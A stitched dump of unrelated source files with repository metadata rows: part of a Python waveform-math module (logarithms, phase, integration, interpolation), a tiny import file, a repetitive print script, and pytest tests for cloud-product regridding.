    .. peng.wave_functions.group_delay
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Group delay is the negated derivative of the unwrapped phase in cycles.
    unwrapped = phase(wave, unwrap=True)
    result = -derivative(unwrapped / (2 * math.pi))
    result.dep_name = "group_delay({0})".format(wave.dep_name)
    result.dep_units = "sec"
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def log(wave):
    r"""
    Return the natural logarithm of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.log
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # The logarithm is only defined for strictly positive values.
    domain_error = bool(min(wave._dep_vector) <= 0)
    pexdoc.exh.addex(ValueError, "Math domain error", domain_error)
    return _operation(wave, "log", "", np.log)
@pexdoc.pcontracts.contract(wave=Waveform)
def log10(wave):
    r"""
    Return the base 10 logarithm of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.log10
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # The logarithm is only defined for strictly positive values.
    domain_error = bool(min(wave._dep_vector) <= 0)
    pexdoc.exh.addex(ValueError, "Math domain error", domain_error)
    return _operation(wave, "log10", "", np.log10)
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def naverage(wave, indep_min=None, indep_max=None):
    r"""
    Return the numerical average of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.naverage
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    # Average value is the trapezoidal area divided by the independent span.
    span = bounded._indep_vector[-1] - bounded._indep_vector[0]
    area = np.trapz(bounded._dep_vector, x=bounded._indep_vector)
    return area / span
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nintegral(wave, indep_min=None, indep_max=None):
    r"""
    Return the numerical integral of a waveform's dependent variable vector.
    The method used is the `trapezoidal
    <https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ method
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: float
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.nintegral
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    # Single scalar: trapezoidal area over the bounded range.
    return np.trapz(bounded._dep_vector, bounded._indep_vector)
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nmax(wave, indep_min=None, indep_max=None):
    r"""
    Return the maximum of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: float
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.nmax
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    # np.amax is the functional alias of np.max.
    return np.amax(bounded._dep_vector)
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nmin(wave, indep_min=None, indep_max=None):
    r"""
    Return the minimum of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: float
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.nmin
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    bounded = copy.copy(wave)
    _bound_waveform(bounded, indep_min, indep_max)
    # np.amin is the functional alias of np.min.
    return np.amin(bounded._dep_vector)
@pexdoc.pcontracts.contract(wave=Waveform, unwrap=bool, rad=bool)
def phase(wave, unwrap=True, rad=True):
    r"""
    Return the phase of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param unwrap: Flag that indicates whether phase should change phase shifts
                   to their :code:`2*pi` complement (True) or not (False)
    :type unwrap: boolean
    :param rad: Flag that indicates whether phase should be returned in radians
                (True) or degrees (False)
    :type rad: boolean
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.phase
    :raises:
     * RuntimeError (Argument \`rad\` is not valid)
     * RuntimeError (Argument \`unwrap\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    result = copy.copy(wave)
    result.dep_units = "rad" if rad else "deg"
    result.dep_name = "phase({0})".format(result.dep_name)
    angles = np.angle(result._dep_vector)
    if unwrap:
        # Remove artificial 2*pi jumps between consecutive samples.
        angles = np.unwrap(angles)
    # Convert to degrees only when radians were not requested.
    result._dep_vector = angles if rad else np.rad2deg(angles)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def real(wave):
    r"""
    Return the real part of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.real
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise real part; units are carried over unchanged.
    result = _operation(wave, "real", wave.dep_units, np.real)
    return result
@pexdoc.pcontracts.contract(wave=Waveform, decimals="int,>=0")
def round(wave, decimals=0):
    r"""
    Round a waveform's dependent variable vector to a given number of decimal places.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param decimals: Number of decimals to round to
    :type decimals: integer
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.round
    :raises:
     * RuntimeError (Argument \`decimals\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # pylint: disable=W0622
    # Complex vectors cannot be meaningfully rounded to integer decimals.
    is_complex = wave._dep_vector.dtype.name.startswith("complex")
    pexdoc.exh.addex(TypeError, "Cannot convert complex to integer", is_complex)
    result = copy.copy(wave)
    result.dep_name = "round({0}, {1})".format(result.dep_name, decimals)
    result._dep_vector = np.round(wave._dep_vector, decimals)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def sin(wave):
    r"""
    Return the sine of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.sin
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise sine; the result is dimensionless.
    result = _operation(wave, "sin", "", np.sin)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def sinh(wave):
    r"""
    Return the hyperbolic sine of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.sinh
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise hyperbolic sine; the result is dimensionless.
    result = _operation(wave, "sinh", "", np.sinh)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def sqrt(wave):
    r"""
    Return the square root of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.sqrt
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Units become the square root of the original dependent-variable units.
    result_units = "{0}**0.5".format(wave.dep_units)
    return _operation(wave, "sqrt", result_units, np.sqrt)
@pexdoc.pcontracts.contract(
    wave=Waveform,
    dep_name="str|None",
    indep_min="None|number",
    indep_max="None|number",
    indep_step="None|number",
)
def subwave(wave, dep_name=None, indep_min=None, indep_max=None, indep_step=None):
    r"""
    Return a waveform that is a sub-set of a waveform, potentially re-sampled.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param dep_name: Independent variable name
    :type dep_name: `NonNullString <https://pexdoc.readthedocs.io/en/stable/
                    ptypes.html#nonnullstring>`_
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :param indep_step: Independent vector step
    :type indep_step: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.subwave
    :raises:
     * RuntimeError (Argument \`dep_name\` is not valid)
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`indep_step\` is greater than independent
       vector range)
     * RuntimeError (Argument \`indep_step\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    result = copy.copy(wave)
    if dep_name is not None:
        result.dep_name = dep_name
    _bound_waveform(result, indep_min, indep_max)
    step_given = indep_step is not None
    # A non-positive step is invalid.
    pexdoc.addai("indep_step", bool(step_given and (indep_step <= 0)))
    # The step must fit inside the (already bounded) independent range.
    indep_span = result._indep_vector[-1] - result._indep_vector[0]
    pexdoc.addex(
        RuntimeError,
        "Argument `indep_step` is greater than independent vector range",
        bool(step_given and (indep_step > indep_span)),
    )
    if indep_step:
        # Re-sample on a regular grid and interpolate the dependent vector.
        new_indep = _barange(indep_min, indep_max, indep_step)
        new_dep = _interp_dep_vector(result, new_indep)
        result._set_indep_vector(new_indep, check=False)
        result._set_dep_vector(new_dep, check=False)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def tan(wave):
    r"""
    Return the tangent of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.tan
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise tangent; the result is dimensionless.
    result = _operation(wave, "tan", "", np.tan)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def tanh(wave):
    r"""
    Return the hyperbolic tangent of a waveform's dependent variable vector.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.tanh
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Element-wise hyperbolic tangent; the result is dimensionless.
    result = _operation(wave, "tanh", "", np.tanh)
    return result
@pexdoc.pcontracts.contract(wave=Waveform)
def wcomplex(wave):
    r"""
    Convert a waveform's dependent variable vector to complex.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.wcomplex
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    ret = copy.copy(wave)
    # np.complex was a deprecated alias of the builtin complex (deprecated in
    # NumPy 1.20, removed in 1.24); astype(complex) yields the same
    # complex128 dtype on every NumPy version.
    ret._dep_vector = ret._dep_vector.astype(complex)
    return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def wfloat(wave):
    r"""
    Convert a waveform's dependent variable vector to float.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.wfloat
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * TypeError (Cannot convert complex to float)
    .. [[[end]]]
    """
    # A complex vector has no well-defined float conversion.
    pexdoc.exh.addex(
        TypeError,
        "Cannot convert complex to float",
        wave._dep_vector.dtype.name.startswith("complex"),
    )
    ret = copy.copy(wave)
    # np.float was a deprecated alias of the builtin float (deprecated in
    # NumPy 1.20, removed in 1.24); astype(float) yields the same float64
    # dtype on every NumPy version.
    ret._dep_vector = ret._dep_vector.astype(float)
    return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def wint(wave):
    r"""
    Convert a waveform's dependent variable vector to integer.
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.wint
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * TypeError (Cannot convert complex to integer)
    .. [[[end]]]
    """
    # A complex vector has no well-defined integer conversion.
    pexdoc.exh.addex(
        TypeError,
        "Cannot convert complex to integer",
        wave._dep_vector.dtype.name.startswith("complex"),
    )
    ret = copy.copy(wave)
    # np.int was a deprecated alias of the builtin int (deprecated in
    # NumPy 1.20, removed in 1.24); astype(int) yields the platform default
    # integer dtype on every NumPy version, same as the old alias did.
    ret._dep_vector = ret._dep_vector.astype(int)
    return ret
@pexdoc.pcontracts.contract(wave=Waveform, indep_var="number")
def wvalue(wave, indep_var):
    r"""
    Return the dependent variable value at a given independent variable point.
    If the independent variable point is not in the independent variable vector
    the dependent variable value is obtained by linear interpolation
    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_var: Independent variable point for which the dependent
                      variable is to be obtained
    :type indep_var: integer or float
    :rtype: :py:class:`peng.eng.Waveform`
    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.wvalue
    :raises:
     * RuntimeError (Argument \`indep_var\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Argument \`indep_var\` is not in the independent
       variable vector range)
    .. [[[end]]]
    """
    # Tolerant comparison against both ends of the independent vector.
    at_start = np.isclose(indep_var, wave._indep_vector[0], FP_RTOL, FP_ATOL)
    at_end = np.isclose(indep_var, wave._indep_vector[-1], FP_RTOL, FP_ATOL)
    below = (indep_var < wave._indep_vector[0]) and (not at_start)
    above = (indep_var > wave._indep_vector[-1]) and (not at_end)
    pexdoc.exh.addex(
        ValueError,
        "Argument `indep_var` is not in the independent variable vector range",
        bool(below or above),
    )
    if at_start:
        return wave._dep_vector[0]
    if at_end:
        return wave._dep_vector[-1]
    # Linear interpolation between the two bracketing samples.
    idx = np.searchsorted(wave._indep_vector, indep_var)
    x_prev = wave._indep_vector[idx - 1]
    x_next = wave._indep_vector[idx]
    y_prev = wave._dep_vector[idx - 1]
    y_next = wave._dep_vector[idx]
    slope = (y_next - y_prev) / float(x_next - x_prev)
    return y_prev + slope * (indep_var - x_prev)
| 30.807447
| 88
| 0.659579
| 8,171
| 62,878
| 4.937584
| 0.054094
| 0.032718
| 0.028752
| 0.032272
| 0.847664
| 0.820672
| 0.786268
| 0.7739
| 0.744479
| 0.731937
| 0
| 0.004304
| 0.220347
| 62,878
| 2,040
| 89
| 30.822549
| 0.818677
| 0.598413
| 0
| 0.360738
| 0
| 0
| 0.070116
| 0
| 0
| 0
| 0
| 0.02402
| 0
| 1
| 0.092282
| false
| 0
| 0.016779
| 0
| 0.211409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b7d9e2f7e9f7f3d1c46eeebd4f9ccc51bc4b34e
| 80
|
py
|
Python
|
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | 1
|
2021-08-30T22:28:57.000Z
|
2021-08-30T22:28:57.000Z
|
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | null | null | null |
bifrost/bifrost/stonne/tiles/__init__.py
|
axelstjerngren/bifrost
|
78f46d51b51b2ea6e4aa62336c052217700d7d35
|
[
"MIT"
] | null | null | null |
from .conv_tiles_config import conv_tiles
from .fc_tiles_config import fc_tiles
| 26.666667
| 41
| 0.875
| 14
| 80
| 4.571429
| 0.428571
| 0.28125
| 0.53125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 80
| 2
| 42
| 40
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0bac3929401bdf58179247faa0a8558acc5f3854
| 232
|
py
|
Python
|
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
photo/photo_album.py
|
bidemiokus/pythonautomation
|
ed5a750aaf5640630026755adff7ae833d1226b4
|
[
"Apache-2.0"
] | null | null | null |
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
print("Here are the photos")
| 25.777778
| 28
| 0.724138
| 40
| 232
| 4.2
| 0.125
| 0.428571
| 0.571429
| 0.714286
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.137931
| 232
| 8
| 29
| 29
| 0.84
| 0
| 0
| 1
| 0
| 0
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 14
|
f00188bd016146b8138ec99f5b5d95cf1e5e72c5
| 28,906
|
py
|
Python
|
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
tests/unit/test_grid_methods.py
|
actris-cloudnet/model-evaluation
|
c505bc54d8797011db28cf2bc7f0bbb8ba0fc36c
|
[
"MIT"
] | null | null | null |
import numpy as np
import numpy.ma as ma
import numpy.testing as testing
import pytest
from model_evaluation.products.model_products import ModelManager
from model_evaluation.products.observation_products import ObservationManager
from model_evaluation.products.grid_methods import ProductGrid
MODEL = 'ecmwf'
OUTPUT_FILE = ''
PRODUCT = 'iwc'
# Regridding a product should create every expected model-data variable
# for the given product type (iwc/cf/lwc).
@pytest.mark.parametrize("product, variables", [
    ("iwc", ("ecmwf_iwc", "iwc_ecmwf", "iwc_att_ecmwf", "iwc_rain_ecmwf",
             "iwc_adv_ecmwf", "iwc_att_adv_ecmwf", "iwc_rain_adv_ecmwf")),
    ("cf", ("ecmwf_cf", "cf_A_ecmwf", "cf_V_ecmwf", "cf_A_adv_ecmwf",
            "cf_V_adv_ecmwf")),
    ("lwc", ("lwc_ecmwf", "lwc_ecmwf", "lwc_adv_ecmwf"))])
def test_generate_regrid_product(model_file, obs_file, product, variables):
    # model_file / obs_file are pytest fixtures (presumably temp netCDF
    # paths from the project conftest — confirm there).
    obs = ObservationManager(product, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, product)
    # Constructing ProductGrid populates model.data as a side effect.
    ProductGrid(model, obs)
    for var in variables:
        assert var in model.data.keys()
@pytest.mark.parametrize("key, value", [
    ("iwc", 3), ("lwc", 1), ("cf", 2)])
def test_get_method_storage(key, value, model_file, obs_file):
    """The non-advection storage dict has `value` entries for product `key`."""
    obs = ObservationManager(key, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, key)
    obj = ProductGrid(model, obs)
    # Only the first (non-advection) storage is checked here; `_` marks the
    # deliberately unused second item (was an unused `y`).
    x, _ = obj._get_method_storage()
    assert len(x.keys()) == value


@pytest.mark.parametrize("key, value", [
    ("iwc", 3), ("lwc", 1), ("cf", 2)])
def test_get_method_storage_adv(key, value, model_file, obs_file):
    """The advection storage dict has `value` entries for product `key`."""
    obs = ObservationManager(key, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, key)
    obj = ProductGrid(model, obs)
    # Only the second (advection) storage is checked here (was an unused `x`).
    _, y = obj._get_method_storage()
    assert len(y.keys()) == value


@pytest.mark.parametrize("name", ['cf_V', 'cf_A'])
def test_cf_method_storage(name, model_file, obs_file):
    """Non-advection cf storage contains the 'cf_V' and 'cf_A' keys."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    x, _ = obj._cf_method_storage()
    assert name in x.keys()


@pytest.mark.parametrize("name", ['cf_V_adv', 'cf_A_adv'])
def test_cf_method_storage_adv(name, model_file, obs_file):
    """Advection cf storage contains the 'cf_V_adv' and 'cf_A_adv' keys."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    _, y = obj._cf_method_storage()
    assert name in y.keys()


@pytest.mark.parametrize("name",
                         ['iwc', 'iwc_att', 'iwc_rain'])
def test_iwc_method_storage(name, model_file, obs_file):
    """Non-advection iwc storage contains the iwc, att and rain keys."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    x, _ = obj._iwc_method_storage()
    assert name in x.keys()


@pytest.mark.parametrize("name",
                         ['iwc_adv', 'iwc_att_adv', 'iwc_rain_adv'])
def test_iwc_method_storage_adv(name, model_file, obs_file):
    """Advection iwc storage contains the *_adv variants of the iwc keys."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    _, y = obj._iwc_method_storage()
    assert name in y.keys()


def test_product_method_storage(model_file, obs_file):
    """Generic product storage is keyed by the product name ('lwc')."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    x, _ = obj._product_method_storage()
    assert 'lwc' in x.keys()


def test_product_method_storage_adv(model_file, obs_file):
    """Generic advection storage is keyed by '<product>_adv' ('lwc_adv')."""
    obs = ObservationManager('lwc', str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, 'lwc')
    obj = ProductGrid(model, obs)
    _, y = obj._product_method_storage()
    assert 'lwc_adv' in y.keys()
# NOTE: every test in this family previously used a local variable named
# `dict`, shadowing the builtin; it is renamed to `grid` throughout.

def test_regrid_cf_area(model_file, obs_file):
    """cf area: 3 of the 4 profiles contain a nonzero value -> 0.75."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    assert x[0, 0] == 0.75


def test_regrid_cf_none(model_file, obs_file):
    """cf area: no data at all yields NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = None
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    assert np.isnan(x[0, 0])


def test_regrid_cf_area_masked(model_file, obs_file):
    """cf area with one masked row: 2 of the 3 remaining rows are cloudy."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    data[1, :] = ma.masked
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    assert round(x[0, 0], 3) == 0.667


def test_regrid_cf_area_all_masked(model_file, obs_file):
    """cf area: a fully masked window yields NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 0]])
    data[:, :] = ma.masked
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    testing.assert_equal(x, np.nan)


def test_regrid_cf_area_nan(model_file, obs_file):
    """cf area: scattered NaNs do not change the 0.75 area fraction."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[1, np.nan, 1], [0, 1, 1], [np.nan, 0, 1], [0, 0, 0]])
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    assert x[0, 0] == 0.75


def test_regrid_cf_area_all_nan(model_file, obs_file):
    """cf area: an all-NaN (but unmasked) window yields 0.0, not NaN."""
    obs = ObservationManager(PRODUCT, str(obs_file))
    model = ModelManager(str(model_file), MODEL, OUTPUT_FILE, PRODUCT)
    obj = ProductGrid(model, obs)
    data = ma.array([[np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan],
                     [np.nan, np.nan, np.nan], [np.nan, np.nan, np.nan]])
    grid = {'cf_A': np.zeros((1, 1))}
    grid = obj._regrid_cf(grid, 0, 0, data)
    x = grid['cf_A']
    testing.assert_equal(x, 0.0)


